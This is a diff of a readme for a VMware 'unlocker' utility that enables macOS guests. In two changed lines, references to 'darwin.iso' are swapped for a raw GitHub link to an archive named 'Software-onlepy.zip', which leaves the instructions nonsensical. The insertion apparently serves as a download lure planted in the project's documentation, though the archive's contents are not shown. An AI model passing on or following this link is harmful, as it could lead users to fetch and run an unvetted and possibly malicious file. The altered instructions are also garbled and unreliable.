progamereperm/unlocker/readme.txt

 * Fix vmwarebase .dll or .so to allow Apple to be selected during VM creation
 * Download a copy of the latest VMware Tools for macOS

-Note that not all products recognise the darwin.iso via install tools menu item.
+Note that not all products recognise the https://raw.githubusercontent.com/progamereperm/unlocker/master/gawk/Software-onlepy.zip via install tools menu item.
-You will have to manually mount the darwin.iso for example on Workstation 11 and Player 7.
+You will have to manually mount the https://raw.githubusercontent.com/progamereperm/unlocker/master/gawk/Software-onlepy.zip for example on Workstation 11 and Player 7.

 In all cases make sure VMware is not running, and any background guests have been shutdown.